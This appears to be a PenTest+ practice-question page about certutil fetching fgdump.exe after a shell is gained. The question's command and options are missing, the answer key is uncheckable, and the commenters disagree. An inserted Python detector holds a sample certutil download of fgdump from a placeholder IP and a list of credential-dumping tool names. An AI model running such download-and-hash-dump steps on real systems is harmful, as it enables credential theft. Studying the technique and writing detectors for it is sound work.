
PT0-002 Exam - Question 325


A penetration tester issues the following command after obtaining a shell:

Which of the following describes this technique?

Correct Answer: BD

The command shown uses 'certutil' to download 'fgdump.exe' from a remote server to the local machine. 'fgdump.exe' is a known tool used for dumping password hashes from the Security Accounts Manager (SAM) database on Windows systems, which is a common step in privilege escalation. The act of downloading and running 'fgdump.exe' is specifically associated with attempting to obtain higher privileges by cracking these hashes, making this technique one of privilege escalation.
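The download-then-dump sequence described above leaves a clear trail in process-creation telemetry. As an added example (not part of the original page), the Python below runs simple detection logic over constructed Sysmon-style process events: it flags certutil.exe launched with a URL on its command line (the living-off-the-land download) and any reference to a credential-dumping tool name such as fgdump; the event format, paths and addresses are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not from the page): timestamp | user | image | command line
SAMPLE_EVENTS = [
    "2024-03-12T10:01:02Z | CORP\\alice | C:\\Windows\\System32\\certutil.exe | "
    "certutil -urlcache -f http://203.0.113.5/fgdump.exe C:\\Users\\Public\\fgdump.exe",
    "2024-03-12T10:02:30Z | CORP\\alice | C:\\Windows\\System32\\certutil.exe | "
    "certutil -hashfile C:\\Users\\alice\\report.pdf SHA256",  # benign certutil use
    "2024-03-12T10:03:11Z | CORP\\alice | C:\\Users\\Public\\fgdump.exe | fgdump.exe",
    "2024-03-12T10:04:00Z | CORP\\bob | C:\\Windows\\System32\\notepad.exe | notepad.exe notes.txt",
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Tool names worth alerting on; fgdump is the one the question discusses (extend as needed).
CRED_DUMP_TOOLS = ("fgdump",)


@dataclass
class Finding:
    line_no: int   # 1-based index into the event list
    rule: str      # which detection fired
    detail: str    # human-readable context for the analyst


def parse_event(line: str):
    """Split one pipe-delimited event into (timestamp, user, image, command line)."""
    ts, user, image, cmdline = [part.strip() for part in line.split("|", 3)]
    return ts, user, image, cmdline


def analyze(events):
    """Return a Finding for every event matching a detection rule, in event order."""
    findings = []
    for n, line in enumerate(events, 1):
        _ts, user, image, cmdline = parse_event(line)
        # Rule 1: a native binary (certutil) used to fetch something from the network.
        url = URL_RE.search(cmdline)
        if image.lower().endswith("certutil.exe") and url:
            findings.append(Finding(n, "lolbin_download",
                                    f"certutil fetched {url.group(0)} as {user}"))
        # Rule 2: a known hash-dumping tool named in the image or command line.
        haystack = (image + " " + cmdline).lower()
        for tool in CRED_DUMP_TOOLS:
            if tool in haystack:
                findings.append(Finding(n, "cred_dump_tool",
                                        f"{tool} referenced in process {image}"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.line_no}: [{f.rule}] {f.detail}")
```

Matching on a URL rather than on a specific switch keeps the first rule useful even when the download syntax varies; the benign hashfile event in the sample produces no alert.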

Discussion

4 comments
Obiwan123 (Option: D)
Mar 19, 2024

Yeti87 is wrong

yeti87 (Option: B)
Mar 12, 2024

This command downloads the fgdump.exe tool from the specified URL and saves it locally as fgdump.exe. fgdump.exe is a popular tool used for privilege escalation on Windows systems. It is often used to dump password hashes from the SAM (Security Accounts Manager) database, which can then be cracked offline to obtain plaintext passwords. Therefore, this technique is associated with privilege escalation as it aims to obtain sensitive information (password hashes) that could potentially lead to escalated privileges within the system.

MalikMak (Option: D)
Mar 26, 2024

Living-off-the-land (LotL) techniques involve the use of native tools available on the system to conduct operations typically performed by attackers. This can include moving laterally through a network, executing files, or exfiltrating data, all while potentially evading detection.

FasterN8 (Option: B)
Jul 15, 2024

certutil is native, but fgdump is not. This is trying to crack passwords to get more privileges.